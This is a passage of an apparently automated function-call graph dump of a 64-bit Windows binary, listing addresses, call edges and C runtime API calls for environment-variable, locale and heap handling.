7ff62666ac63 20136->20137 20140 7ff6266554e8 LeaveCriticalSection 20137->20140 18854 7ff62664bb50 18855 7ff62664bb7e 18854->18855 18856 7ff62664bb65 18854->18856 18856->18855 18858 7ff62665d66c 12 API calls 18856->18858 18857 7ff62664bbde 18858->18857 18859 7ff6266599d1 18860 7ff62665a448 45 API calls 18859->18860 18861 7ff6266599d6 18860->18861 18862 7ff6266599fd GetModuleHandleW 18861->18862 18863 7ff626659a47 18861->18863 18862->18863 18869 7ff626659a0a 18862->18869 18871 7ff6266598d4 18863->18871 18869->18863 18885 7ff626659af8 GetModuleHandleExW 18869->18885 18891 7ff626660348 EnterCriticalSection 18871->18891 18886 7ff626659b2c GetProcAddress 18885->18886 18887 7ff626659b55 18885->18887 18888 7ff626659b3e 18886->18888 18889 7ff626659b5a FreeLibrary 18887->18889 18890 7ff626659b61 18887->18890 18888->18887 18889->18890 18890->18863 19022 7ff626660938 19023 7ff62666095c 19022->19023 19026 7ff62666096c 19022->19026 19024 7ff626654f78 _get_daylight 11 API calls 19023->19024 19043 7ff626660961 19024->19043 19025 7ff626660c4c 19028 7ff626654f78 _get_daylight 11 API calls 19025->19028 19026->19025 19027 7ff62666098e 19026->19027 19029 7ff6266609af 19027->19029 19153 7ff626660ff4 19027->19153 19030 7ff626660c51 19028->19030 19033 7ff626660a21 19029->19033 19035 7ff6266609d5 19029->19035 19039 7ff626660a15 19029->19039 19032 7ff62665a9b8 __free_lconv_mon 11 API calls 19030->19032 19032->19043 19037 7ff62665ec08 _get_daylight 11 API calls 19033->19037 19053 7ff6266609e4 19033->19053 19034 7ff626660ace 19047 7ff626660aeb 19034->19047 19054 7ff626660b3d 19034->19054 19168 7ff626659730 19035->19168 19040 7ff626660a37 19037->19040 19039->19034 19039->19053 19174 7ff62666719c 19039->19174 19044 7ff62665a9b8 __free_lconv_mon 11 API calls 19040->19044 19042 7ff62665a9b8 __free_lconv_mon 11 API calls 19042->19043 19049 7ff626660a45 19044->19049 19045 7ff6266609fd 19045->19039 19052 7ff626660ff4 45 API calls 19045->19052 19046 7ff6266609df 19050 7ff626654f78 _get_daylight 11 API calls 19046->19050 19048 7ff62665a9b8 __free_lconv_mon 11 API calls 19047->19048 19051 7ff626660af4 19048->19051 19049->19039 19049->19053 19057 7ff62665ec08 _get_daylight 11 API calls 19049->19057 19050->19053 19062 7ff626660af9 19051->19062 19210 7ff62666344c 19051->19210 19052->19039 19053->19042 19054->19053 19055 7ff62666344c 40 API calls 19054->19055 19056 7ff626660b7a 19055->19056 19058 7ff62665a9b8 __free_lconv_mon 11 API calls 19056->19058 19060 7ff626660a67 19057->19060 19061 7ff626660b84 19058->19061 19065 7ff62665a9b8 __free_lconv_mon 11 API calls 19060->19065 19061->19053 19061->19062 19063 7ff626660c40 19062->19063 19068 7ff62665ec08 _get_daylight 11 API calls 19062->19068 19066 7ff62665a9b8 __free_lconv_mon 11 API calls 19063->19066 19064 7ff626660b25 19067 7ff62665a9b8 __free_lconv_mon 11 API calls 19064->19067 19065->19039 19066->19043 19067->19062 19069 7ff626660bc8 19068->19069 19070 7ff626660bd9 19069->19070 19071 7ff626660bd0 19069->19071 19072 7ff62665a514 __std_exception_copy 37 API calls 19070->19072 19073 7ff62665a9b8 __free_lconv_mon 11 API calls 19071->19073 19074 7ff626660be8 19072->19074 19075 7ff626660bd7 19073->19075 19076 7ff626660c7b 19074->19076 19077 7ff626660bf0 19074->19077 19080 7ff62665a9b8 __free_lconv_mon 11 API calls 19075->19080 19079 7ff62665a970 _isindst 17 API calls 19076->19079 19219 7ff6266672b4 19077->19219 19082 7ff626660c8f 19079->19082 19080->19043 19085 7ff626660cb8 19082->19085 19091 7ff626660cc8 19082->19091 19083 7ff626660c17 19086 7ff626654f78 _get_daylight 11 API calls 19083->19086 19084 7ff626660c38 19088 7ff62665a9b8 __free_lconv_mon 11 API calls 19084->19088 19087 7ff626654f78 _get_daylight 11 API calls 19085->19087 19089 7ff626660c1c 19086->19089 19112 7ff626660cbd 19087->19112 19088->19063 19092 7ff62665a9b8 __free_lconv_mon 11 API calls 19089->19092 19090 7ff626660fab 19094 7ff626654f78 _get_daylight 11 API calls 19090->19094 19091->19090 19093 7ff626660cea 19091->19093 19092->19075 19095 7ff626660d07 19093->19095 19238 7ff6266610dc 19093->19238 19096 7ff626660fb0 19094->19096 19099 7ff626660d7b 19095->19099 19101 7ff626660d2f 19095->19101 19107 7ff626660d6f 19095->19107 19098 7ff62665a9b8 __free_lconv_mon 11 API calls 19096->19098 19098->19112 19103 7ff626660da3 19099->19103 19108 7ff62665ec08 _get_daylight 11 API calls 19099->19108 19123 7ff626660d3e 19099->19123 19100 7ff626660e2e 19111 7ff626660e4b 19100->19111 19120 7ff626660e9e 19100->19120 19253 7ff62665976c 19101->19253 19105 7ff62665ec08 _get_daylight 11 API calls 19103->19105 19103->19107 19103->19123 19110 7ff626660dc5 19105->19110 19106 7ff62665a9b8 __free_lconv_mon 11 API calls 19106->19112 19107->19100 19107->19123 19259 7ff62666705c 19107->19259 19113 7ff626660d95 19108->19113 19116 7ff62665a9b8 __free_lconv_mon 11 API calls 19110->19116 19117 7ff62665a9b8 __free_lconv_mon 11 API calls 19111->19117 19118 7ff62665a9b8 __free_lconv_mon 11 API calls 19113->19118 19114 7ff626660d57 19114->19107 19122 7ff6266610dc 45 API calls 19114->19122 19115 7ff626660d39 19119 7ff626654f78 _get_daylight 11 API calls 19115->19119 19116->19107 19121 7ff626660e54 19117->19121 19118->19103 19119->19123 19120->19123 19124 7ff62666344c 40 API calls 19120->19124 19127 7ff62666344c 40 API calls 19121->19127 19129 7ff626660e5a 19121->19129 19122->19107 19123->19106 19125 7ff626660edc 19124->19125 19126 7ff62665a9b8 __free_lconv_mon 11 API calls 19125->19126 19128 7ff626660ee6 19126->19128 19131 7ff626660e86 19127->19131 19128->19123 19128->19129 19130 7ff626660f9f 19129->19130 19134 7ff62665ec08 _get_daylight 11 API calls 19129->19134 19132 7ff62665a9b8 __free_lconv_mon 11 API calls 19130->19132 19133 7ff62665a9b8 __free_lconv_mon 11 API calls 19131->19133 19132->19112 19133->19129 19135 7ff626660f2b 19134->19135 19136 7ff626660f3c 19135->19136 19137 7ff626660f33 19135->19137 19138 7ff6266604e4 37 API calls 19136->19138 19139 7ff62665a9b8 __free_lconv_mon 11 API calls 19137->19139 19141 7ff626660f4a 19138->19141 19140 7ff626660f3a 19139->19140 19147 7ff62665a9b8 __free_lconv_mon 11 API calls 19140->19147 19142 7ff626660f52 SetEnvironmentVariableW 19141->19142 19143 7ff626660fdf 19141->19143 19144 7ff626660f97 19142->19144 19145 7ff626660f76 19142->19145 19146 7ff62665a970 _isindst 17 API calls 19143->19146 19150 7ff62665a9b8 __free_lconv_mon 11 API calls 19144->19150 19148 7ff626654f78 _get_daylight 11 API calls 19145->19148 19149 7ff626660ff3 19146->19149 19147->19112 19151 7ff626660f7b 19148->19151 19150->19130 19152 7ff62665a9b8 __free_lconv_mon 11 API calls 19151->19152 19152->19140 19154 7ff626661029 19153->19154 19155 7ff626661011 19153->19155 19156 7ff62665ec08 _get_daylight 11 API calls 19154->19156 19155->19029 19162 7ff62666104d 19156->19162 19157 7ff6266610ae 19160 7ff62665a9b8 __free_lconv_mon 11 API calls 19157->19160 19158 7ff62665a574 _CreateFrameInfo 45 API calls 19159 7ff6266610d8 19158->19159 19160->19155 19161 7ff62665ec08 _get_daylight 11 API calls 19161->19162 19162->19157 19162->19161 19163 7ff62665a9b8 __free_lconv_mon 11 API calls 19162->19163 19164 7ff62665a514 __std_exception_copy 37 API calls 19162->19164 19165 7ff6266610bd 19162->19165 19167 7ff6266610d2 19162->19167 19163->19162 19164->19162 19166 7ff62665a970 _isindst 17 API calls 19165->19166 19166->19167 19167->19158 19169 7ff626659749 19168->19169 19170 7ff626659740 19168->19170 19169->19045 19169->19046 19170->19169 19283 7ff626659208 19170->19283 19175 7ff6266671a9 19174->19175 19176 7ff6266662c4 19174->19176 19178 7ff626654fbc 45 API calls 19175->19178 19177 7ff6266662d1 19176->19177 19183 7ff626666307 19176->19183 19179 7ff626654f78 _get_daylight 11 API calls 19177->19179 19198 7ff626666278 19177->19198 19180 7ff6266671dd 19178->19180 19182 7ff6266662db 19179->19182 19184 7ff6266671e2 19180->19184 19188 7ff6266671f3 19180->19188 19190 7ff62666720a 19180->19190 19181 7ff626666331 19185 7ff626654f78 _get_daylight 11 API calls 19181->19185 19186 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19182->19186 19183->19181 19187 7ff626666356 19183->19187 19184->19039 19189 7ff626666336 19185->19189 19193 7ff6266662e6 19186->19193 19197 7ff626654fbc 45 API calls 19187->19197 19201 7ff626666341 19187->19201 19192 7ff626654f78 _get_daylight 11 API calls 19188->19192 19191 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19189->19191 19195 7ff626667226 19190->19195 19196 7ff626667214 19190->19196 19191->19201 19194 7ff6266671f8 19192->19194 19193->19039 19199 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19194->19199 19202 7ff626667237 19195->19202 19203 7ff62666724e 19195->19203 19200 7ff626654f78 _get_daylight 11 API calls 19196->19200 19197->19201 19198->19039 19199->19184 19205 7ff626667219 19200->19205 19201->19039 19506 7ff626666314 19202->19506 19515 7ff626668fbc 19203->19515 19208 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19205->19208 19208->19184 19209 7ff626654f78 _get_daylight 11 API calls 19209->19184 19211 7ff62666348b 19210->19211 19212 7ff62666346e 19210->19212 19216 7ff626663495 19211->19216 19555 7ff626667ca8 19211->19555 19212->19211 19213 7ff62666347c 19212->19213 19214 7ff626654f78 _get_daylight 11 API calls 19213->19214 19218 7ff626663481 memcpy_s 19214->19218 19562 7ff626667ce4 19216->19562 19218->19064 19220 7ff626654fbc 45 API calls 19219->19220 19221 7ff62666731a 19220->19221 19223 7ff626667328 19221->19223 19574 7ff62665ef94 19221->19574 19577 7ff62665551c 19223->19577 19226 7ff626667414 19229 7ff626667425 19226->19229 19230 7ff62665a9b8 __free_lconv_mon 11 API calls 19226->19230 19227 7ff626654fbc 45 API calls 19228 7ff626667397 19227->19228 19232 7ff62665ef94 5 API calls 19228->19232 19235 7ff6266673a0 19228->19235 19231 7ff626660c13 19229->19231 19233 7ff62665a9b8 __free_lconv_mon 11 API calls 19229->19233 19230->19229 19231->19083 19231->19084 19232->19235 19233->19231 19234 7ff62665551c 14 API calls 19236 7ff6266673fb 19234->19236 19235->19234 19236->19226 19237 7ff626667403 SetEnvironmentVariableW 19236->19237 19237->19226 19239 7ff62666111c 19238->19239 19240 7ff6266610ff 19238->19240 19241 7ff62665ec08 _get_daylight 11 API calls 19239->19241 19240->19095 19248 7ff626661140 19241->19248 19242 7ff6266611c4 19244 7ff62665a574 _CreateFrameInfo 45 API calls 19242->19244 19243 7ff6266611a1 19246 7ff62665a9b8 __free_lconv_mon 11 API calls 19243->19246 19245 7ff6266611ca 19244->19245 19246->19240 19247 7ff62665ec08 _get_daylight 11 API calls 19247->19248 19248->19242 19248->19243 19248->19247 19249 7ff62665a9b8 __free_lconv_mon 11 API calls 19248->19249 19250 7ff6266604e4 37 API calls 19248->19250 19251 7ff6266611b0 19248->19251 19249->19248 19250->19248 19252 7ff62665a970 _isindst 17 API calls 19251->19252 19252->19242 19254 7ff62665977c 19253->19254 19255 7ff626659785 19253->19255 19254->19255 19599 7ff62665927c 19254->19599 19255->19114 19255->19115 19260 7ff626667069 19259->19260 19265 7ff626667096 19259->19265 19261 7ff62666706e 19260->19261 19260->19265 19262 7ff626654f78 _get_daylight 11 API calls 19261->19262 19263 7ff626667073 19262->19263 19266 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19263->19266 19264 7ff6266670da 19268 7ff626654f78 _get_daylight 11 API calls 19264->19268 19265->19264 19267 7ff6266670f9 19265->19267 19281 7ff6266670ce __crtLCMapStringW 19265->19281 19269 7ff62666707e 19266->19269 19270 7ff626667103 19267->19270 19271 7ff626667115 19267->19271 19272 7ff6266670df 19268->19272 19269->19107 19273 7ff626654f78 _get_daylight 11 API calls 19270->19273 19274 7ff626654fbc 45 API calls 19271->19274 19275 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19272->19275 19276 7ff626667108 19273->19276 19277 7ff626667122 19274->19277 19275->19281 19278 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19276->19278 19277->19281 19646 7ff626668b78 19277->19646 19278->19281 19281->19107 19282 7ff626654f78 _get_daylight 11 API calls 19282->19281 19284 7ff626659221 19283->19284 19294 7ff62665921d 19283->19294 19306 7ff626662660 19284->19306 19289 7ff626659233 19292 7ff62665a9b8 __free_lconv_mon 11 API calls 19289->19292 19290 7ff62665923f 19332 7ff6266592ec 19290->19332 19292->19294 19294->19169 19298 7ff62665955c 19294->19298 19295 7ff62665a9b8 __free_lconv_mon 11 API calls 19296 7ff626659266 19295->19296 19297 7ff62665a9b8 __free_lconv_mon 11 API calls 19296->19297 19297->19294 19299 7ff626659585 19298->19299 19304 7ff62665959e 19298->19304 19299->19169 19300 7ff626660858 WideCharToMultiByte 19300->19304 19301 7ff62665ec08 _get_daylight 11 API calls 19301->19304 19302 7ff62665962e 19303 7ff62665a9b8 __free_lconv_mon 11 API calls 19302->19303 19303->19299 19304->19299 19304->19300 19304->19301 19304->19302 19305 7ff62665a9b8 __free_lconv_mon 11 API calls 19304->19305 19305->19304 19307 7ff62666266d 19306->19307 19311 7ff626659226 19306->19311 19351 7ff62665b294 19307->19351 19312 7ff62666299c GetEnvironmentStringsW 19311->19312 19313 7ff6266629cc 19312->19313 19314 7ff62665922b 19312->19314 19315 7ff626660858 WideCharToMultiByte 19313->19315 19314->19289 19314->19290 19316 7ff626662a1d 19315->19316 19317 7ff626662a24 FreeEnvironmentStringsW 19316->19317 19318 7ff62665d66c _fread_nolock 12 API calls 19316->19318 19317->19314 19319 7ff626662a37 19318->19319 19320 7ff626662a48 19319->19320 19321 7ff626662a3f 19319->19321 19323 7ff626660858 WideCharToMultiByte 19320->19323 19322 7ff62665a9b8 __free_lconv_mon 11 API calls 19321->19322 19324 7ff626662a46 19322->19324 19325 7ff626662a6b 19323->19325 19324->19317 19326 7ff626662a79 19325->19326 19327 7ff626662a6f 19325->19327 19329 7ff62665a9b8 __free_lconv_mon 11 API calls 19326->19329 19328 7ff62665a9b8 __free_lconv_mon 11 API calls 19327->19328 19330 7ff626662a77 FreeEnvironmentStringsW 19328->19330 19329->19330 19330->19314 19333 7ff626659311 19332->19333 19334 7ff62665ec08 _get_daylight 11 API calls 19333->19334 19335 7ff626659347 19334->19335 19337 7ff6266593c2 19335->19337 19340 7ff62665ec08 _get_daylight 11 API calls 19335->19340 19341 7ff6266593b1 19335->19341 19343 7ff62665a514 __std_exception_copy 37 API calls 19335->19343 19346 7ff6266593e7 19335->19346 19347 7ff62665934f 19335->19347 19349 7ff62665a9b8 __free_lconv_mon 11 API calls 19335->19349 19336 7ff62665a9b8 __free_lconv_mon 11 API calls 19339 7ff626659247 19336->19339 19338 7ff62665a9b8 __free_lconv_mon 11 API calls 19337->19338 19338->19339 19339->19295 19340->19335 19500 7ff626659518 19341->19500 19343->19335 19345 7ff62665a9b8 __free_lconv_mon 11 API calls 19345->19347 19348 7ff62665a970 _isindst 17 API calls 19346->19348 19347->19336 19350 7ff6266593fa 19348->19350 19349->19335 19352 7ff62665b2a5 FlsGetValue 19351->19352 19353 7ff62665b2c0 FlsSetValue 19351->19353 19354 7ff62665b2ba 19352->19354 19355 7ff62665b2b2 19352->19355 19353->19355 19356 7ff62665b2cd 19353->19356 19354->19353 19357 7ff62665a574 _CreateFrameInfo 45 API calls 19355->19357 19359 7ff62665b2b8 19355->19359 19358 7ff62665ec08 _get_daylight 11 API calls 19356->19358 19360 7ff62665b335 19357->19360 19361 7ff62665b2dc 19358->19361 19371 7ff626662334 19359->19371 19362 7ff62665b2fa FlsSetValue 19361->19362 19363 7ff62665b2ea FlsSetValue 19361->19363 19365 7ff62665b306 FlsSetValue 19362->19365 19366 7ff62665b318 19362->19366 19364 7ff62665b2f3 19363->19364 19367 7ff62665a9b8 __free_lconv_mon 11 API calls 19364->19367 19365->19364 19368 7ff62665af64 _get_daylight 11 API calls 19366->19368 19367->19355 19369 7ff62665b320 19368->19369 19370 7ff62665a9b8 __free_lconv_mon 11 API calls 19369->19370 19370->19359 19394 7ff6266625a4 19371->19394 19373 7ff626662369 19409 7ff626662034 19373->19409 19376 7ff626662386 19376->19311 19377 7ff62665d66c _fread_nolock 12 API calls 19378 7ff626662397 19377->19378 19379 7ff62666239f 19378->19379 19381 7ff6266623ae 19378->19381 19380 7ff62665a9b8 __free_lconv_mon 11 API calls 19379->19380 19380->19376 19381->19381 19416 7ff6266626dc 19381->19416 19384 7ff6266624aa 19385 7ff626654f78 _get_daylight 11 API calls 19384->19385 19386 7ff6266624af 19385->19386 19388 7ff62665a9b8 __free_lconv_mon 11 API calls 19386->19388 19387 7ff626662505 19390 7ff62666256c 19387->19390 19427 7ff626661e64 19387->19427 19388->19376 19389 7ff6266624c4 19389->19387 19392 7ff62665a9b8 __free_lconv_mon 11 API calls 19389->19392 19391 7ff62665a9b8 __free_lconv_mon 11 API calls 19390->19391 19391->19376 19392->19387 19395 7ff6266625c7 19394->19395 19396 7ff6266625d1 19395->19396 19442 7ff626660348 EnterCriticalSection 19395->19442 19398 7ff626662643 19396->19398 19401 7ff62665a574 _CreateFrameInfo 45 API calls 19396->19401 19398->19373 19403 7ff62666265b 19401->19403 19405 7ff6266626b2 19403->19405 19406 7ff62665b294 50 API calls 19403->19406 19405->19373 19407 7ff62666269c 19406->19407 19408 7ff626662334 65 API calls 19407->19408 19408->19405 19410 7ff626654fbc 45 API calls 19409->19410 19411 7ff626662048 19410->19411 19412 7ff626662066 19411->19412 19413 7ff626662054 GetOEMCP 19411->19413 19414 7ff62666207b 19412->19414 19415 7ff62666206b GetACP 19412->19415 19413->19414 19414->19376 19414->19377 19415->19414 19417 7ff626662034 47 API calls 19416->19417 19418 7ff626662709 19417->19418 19419 7ff62666285f 19418->19419 19420 7ff626662746 IsValidCodePage 19418->19420 19426 7ff626662760 memcpy_s 19418->19426 19421 7ff62664c5c0 _log10_special 8 API calls 19419->19421 19420->19419 19422 7ff626662757 19420->19422 19423 7ff6266624a1 19421->19423 19424 7ff626662786 GetCPInfo 19422->19424 19422->19426 19423->19384 19423->19389 19424->19419 19424->19426 19443 7ff62666214c 19426->19443 19499 7ff626660348 EnterCriticalSection 19427->19499 19444 7ff626662189 GetCPInfo 19443->19444 19453 7ff62666227f 19443->19453 19450 7ff62666219c 19444->19450 19444->19453 19445 7ff62664c5c0 _log10_special 8 API calls 19447 7ff62666231e 19445->19447 19446 7ff626662eb0 48 API calls 19448 7ff626662213 19446->19448 19447->19419 19454 7ff626667bf4 19448->19454 19450->19446 19452 7ff626667bf4 54 API calls 19452->19453 19453->19445 19455 7ff626654fbc 45 API calls 19454->19455 19456 7ff626667c19 19455->19456 19459 7ff6266678c0 19456->19459 19460 7ff626667901 19459->19460 19461 7ff62665f910 _fread_nolock MultiByteToWideChar 19460->19461 19464 7ff62666794b 19461->19464 19462 7ff626667bc9 19463 7ff62664c5c0 _log10_special 8 API calls 19462->19463 19465 7ff626662246 19463->19465 19464->19462 19466 7ff62665d66c _fread_nolock 12 API calls 19464->19466 19467 7ff626667a81 19464->19467 19469 7ff626667983 19464->19469 19465->19452 19466->19469 19467->19462 19468 7ff62665a9b8 __free_lconv_mon 11 API calls 19467->19468 19468->19462 19469->19467 19470 7ff62665f910 _fread_nolock MultiByteToWideChar 19469->19470 19471 7ff6266679f6 19470->19471 19471->19467 19490 7ff62665f154 19471->19490 19474 7ff626667a92 19477 7ff62665d66c _fread_nolock 12 API calls 19474->19477 19478 7ff626667b64 19474->19478 19480 7ff626667ab0 19474->19480 19475 7ff626667a41 19475->19467 19476 7ff62665f154 __crtLCMapStringW 6 API calls 19475->19476 19476->19467 19477->19480 19478->19467 19479 7ff62665a9b8 __free_lconv_mon 11 API calls 19478->19479 19479->19467 19480->19467 19481 7ff62665f154 __crtLCMapStringW 6 API calls 19480->19481 19482 7ff626667b30 19481->19482 19482->19478 19483 7ff626667b66 19482->19483 19484 7ff626667b50 19482->19484 19486 7ff626660858 WideCharToMultiByte 19483->19486 19485 7ff626660858 WideCharToMultiByte 19484->19485 19487 7ff626667b5e 19485->19487 19486->19487 19487->19478 19488 7ff626667b7e 19487->19488 19488->19467 19489 7ff62665a9b8 __free_lconv_mon 11 API calls 19488->19489 19489->19467 19491 7ff62665ed80 __crtLCMapStringW 5 API calls 19490->19491 19492 7ff62665f192 19491->19492 19493 7ff62665f19a 19492->19493 19496 7ff62665f240 19492->19496 19493->19467 19493->19474 19493->19475 19495 7ff62665f203 LCMapStringW 19495->19493 19497 7ff62665ed80 __crtLCMapStringW 5 API calls 19496->19497 19498 7ff62665f26e __crtLCMapStringW 19497->19498 19498->19495 19501 7ff62665951d 19500->19501 19502 7ff6266593b9 19500->19502 19503 7ff626659546 19501->19503 19504 7ff62665a9b8 __free_lconv_mon 11 API calls 19501->19504 19502->19345 19505 7ff62665a9b8 __free_lconv_mon 11 API calls 19503->19505 19504->19501 19505->19502 19507 7ff626666348 19506->19507 19508 7ff626666331 19506->19508 19507->19508 19510 7ff626666356 19507->19510 19509 7ff626654f78 _get_daylight 11 API calls 19508->19509 19511 7ff626666336 19509->19511 19513 7ff626654fbc 45 API calls 19510->19513 19514 7ff626666341 19510->19514 19512 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19511->19512 19512->19514 19513->19514 19514->19184 19516 7ff626654fbc 45 API calls 19515->19516 19517 7ff626668fe1 19516->19517 19520 7ff626668c38 19517->19520 19522 7ff626668c86 19520->19522 19521 7ff62664c5c0 _log10_special 8 API calls 19523 7ff626667275 19521->19523 19524 7ff626668d0d 19522->19524 19526 7ff626668cf8 GetCPInfo 19522->19526 19529 7ff626668d11 19522->19529 19523->19184 19523->19209 19525 7ff62665f910 _fread_nolock MultiByteToWideChar 19524->19525 19524->19529 19527 7ff626668da5 19525->19527 19526->19524 19526->19529 19528 7ff62665d66c _fread_nolock 12 API calls 19527->19528 19527->19529 19530 7ff626668ddc 19527->19530 19528->19530 19529->19521 19530->19529 19531 7ff62665f910 _fread_nolock MultiByteToWideChar 19530->19531 19532 7ff626668e4a 19531->19532 19533 7ff62665f910 _fread_nolock MultiByteToWideChar 19532->19533 19542 7ff626668f2c 19532->19542 19535 7ff626668e70 19533->19535 19534 7ff62665a9b8 __free_lconv_mon 11 API calls 19534->19529 19536 7ff62665d66c _fread_nolock 12 API calls 19535->19536 19537 7ff626668e9d 19535->19537 19535->19542 19536->19537 19538 7ff62665f910 _fread_nolock MultiByteToWideChar 19537->19538 19537->19542 19539 7ff626668f14 19538->19539 19540 7ff626668f1a 19539->19540 19541 7ff626668f34 19539->19541 19540->19542 19544 7ff62665a9b8 __free_lconv_mon 11 API calls 19540->19544 19549 7ff62665efd8 19541->19549 19542->19529 19542->19534 19544->19542 19546 7ff626668f73 19546->19529 19548 7ff62665a9b8 __free_lconv_mon 11 API calls 19546->19548 19547 7ff62665a9b8 __free_lconv_mon 11 API calls 19547->19546 19548->19529 19550 7ff62665ed80 __crtLCMapStringW 5 API calls 19549->19550 19551 7ff62665f016 19550->19551 19552 7ff62665f01e 19551->19552 19553 7ff62665f240 __crtLCMapStringW 5 API calls 19551->19553 19552->19546 19552->19547 19554 7ff62665f087 CompareStringW 19553->19554 19554->19552 19556 7ff626667cca HeapSize 19555->19556 19557 7ff626667cb1 19555->19557 19558 7ff626654f78 _get_daylight 11 API calls 19557->19558 19559 7ff626667cb6 19558->19559 19560 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19559->19560 19561 7ff626667cc1 19560->19561 19561->19216 19563 7ff626667cf9 19562->19563 19564 7ff626667d03 19562->19564 19565 7ff62665d66c _fread_nolock 12 API calls 19563->19565 19566 7ff626667d08 19564->19566 19572 7ff626667d0f _get_daylight 19564->19572 19570 7ff626667d01 19565->19570 19567 7ff62665a9b8 __free_lconv_mon 11 API calls 19566->19567 19567->19570 19568 7ff626667d42 HeapReAlloc 19568->19570 19568->19572 19569 7ff626667d15 19571 7ff626654f78 _get_daylight 11 API calls 19569->19571 19570->19218 19571->19570 19572->19568 19572->19569 19573 7ff626663600 _get_daylight 2 API calls 19572->19573 19573->19572 19575 7ff62665ed80 __crtLCMapStringW 5 API calls 19574->19575 19576 7ff62665efb4 19575->19576 19576->19223 19578 7ff62665556a 19577->19578 19579 7ff626655546 19577->19579 19581 7ff6266555c4 19578->19581 19582 7ff62665556f 19578->19582 19580 7ff626655555 19579->19580 19584 7ff62665a9b8 __free_lconv_mon 11 API calls 19579->19584 19580->19226 19580->19227 19583 7ff62665f910 _fread_nolock MultiByteToWideChar 19581->19583 19582->19580 19586 7ff62665a9b8 __free_lconv_mon 11 API calls 19582->19586 19591 7ff626655584 19582->19591 19589 7ff6266555e0 19583->19589 19584->19580 19585 7ff6266555e7 GetLastError 19588 7ff626654eec _fread_nolock 11 API calls 19585->19588 19586->19591 19587 7ff62665d66c _fread_nolock 12 API calls 19587->19580 19593 7ff6266555f4 19588->19593 19589->19585 19590 7ff626655622 19589->19590 19594 7ff626655615 19589->19594 19597 7ff62665a9b8 __free_lconv_mon 11 API calls 19589->19597 19590->19580 19592 7ff62665f910 _fread_nolock MultiByteToWideChar 19590->19592 19591->19587 19595 7ff626655666 19592->19595 19596 7ff626654f78 _get_daylight 11 API calls 19593->19596 19598 7ff62665d66c _fread_nolock 12 API calls 19594->19598 19595->19580 19595->19585 19596->19580 19597->19594 19598->19590 19600 7ff626659295 19599->19600 19601 7ff626659291 19599->19601 19620 7ff626662aac GetEnvironmentStringsW 19600->19620 19601->19255 19612 7ff62665963c 19601->19612 19604 7ff6266592a2 19606 7ff62665a9b8 __free_lconv_mon 11 API calls 19604->19606 19605 7ff6266592ae 19627 7ff6266593fc 19605->19627 19606->19601 19609 7ff62665a9b8 __free_lconv_mon 11 API calls 19610 7ff6266592d5 19609->19610 19611 7ff62665a9b8 __free_lconv_mon 11 API calls 19610->19611 19611->19601 19613 7ff62665965f 19612->19613 19619 7ff626659676 19612->19619 19613->19255 19614 7ff62665ec08 _get_daylight 11 API calls 19614->19619 19615 7ff6266596ea 19617 7ff62665a9b8 __free_lconv_mon 11 API calls 19615->19617 19616 7ff62665f910 MultiByteToWideChar _fread_nolock 19616->19619 19617->19613 19618 7ff62665a9b8 __free_lconv_mon 11 API calls 19618->19619 19619->19613 19619->19614 19619->19615 19619->19616 19619->19618 19621 7ff62665929a 19620->19621 19622 7ff626662ad0 19620->19622 19621->19604 19621->19605 19623 7ff62665d66c _fread_nolock 12 API calls 19622->19623 19624 7ff626662b07 memcpy_s 19623->19624 19625 7ff62665a9b8 __free_lconv_mon 11 API calls 19624->19625 19626 7ff626662b27 FreeEnvironmentStringsW 19625->19626 19626->19621 19628 7ff626659424 19627->19628 19629 7ff62665ec08 _get_daylight 11 API calls 19628->19629 19640 7ff62665945f 19629->19640 19630 7ff62665a9b8 __free_lconv_mon 11 API calls 19631 7ff6266592b6 19630->19631 19631->19609 19632 7ff6266594e1 19633 7ff62665a9b8 __free_lconv_mon 11 API calls 19632->19633 19633->19631 19634 7ff62665ec08 _get_daylight 11 API calls 19634->19640 19635 7ff6266594d0 19637 7ff626659518 11 API calls 19635->19637 19636 7ff6266604e4 37 API calls 19636->19640 19638 7ff6266594d8 19637->19638 19641 7ff62665a9b8 __free_lconv_mon 11 API calls 19638->19641 19639 7ff626659504 19644 7ff62665a970 _isindst 17 API calls 19639->19644 19640->19632 19640->19634 19640->19635 19640->19636 19640->19639 19642 7ff62665a9b8 __free_lconv_mon 11 API calls 19640->19642 19643 7ff626659467 19640->19643 19641->19643 19642->19640 19643->19630 19645 7ff626659516 19644->19645 19647 7ff626668ba1 __crtLCMapStringW 19646->19647 19648 7ff62666715e 19647->19648 19649 7ff62665efd8 6 API calls 19647->19649 19648->19281 19648->19282 19649->19648 19896 7ff62664cbc0 19897 7ff62664cbd0 19896->19897 19913 7ff626659c18 19897->19913 19899 7ff62664cbdc 19919 7ff62664ceb8 19899->19919 19901 7ff62664cc49 19902 7ff62664d19c 7 API calls 19901->19902 19912 7ff62664cc65 19901->19912 19904 7ff62664cc75 19902->19904 19903 7ff62664cbf4 _RTC_Initialize 19903->19901 19924 7ff62664d068 19903->19924 19906 7ff62664cc09 19927 7ff626659084 19906->19927 19914 7ff626659c29 19913->19914 19915 7ff626654f78 _get_daylight 11 API calls 19914->19915 19916 7ff626659c31 19914->19916 19917 7ff626659c40 19915->19917 19916->19899 19918 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19917->19918 19918->19916 19920 7ff62664cec9 19919->19920 19921 7ff62664cece __scrt_release_startup_lock 19919->19921 19920->19921 19922 7ff62664d19c 7 API calls 19920->19922 19921->19903 19923 7ff62664cf42 19922->19923 19952 7ff62664d02c 19924->19952 19926 7ff62664d071 19926->19906 19928 7ff62664cc15 19927->19928 19929 7ff6266590a4 19927->19929 19928->19901 19951 7ff62664d13c InitializeSListHead 19928->19951 19930 7ff6266590ac 19929->19930 19931 7ff6266590c2 GetModuleFileNameW 19929->19931 19932 7ff626654f78 _get_daylight 11 API calls 19930->19932 19935 7ff6266590ed 19931->19935 19933 7ff6266590b1 19932->19933 19934 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19933->19934 19934->19928 19967 7ff626659024 19935->19967 19938 7ff626659135 19939 7ff626654f78 _get_daylight 11 API calls 19938->19939 19940 7ff62665913a 19939->19940 19943 7ff62665a9b8 __free_lconv_mon 11 API calls 19940->19943 19941 7ff62665914d 19942 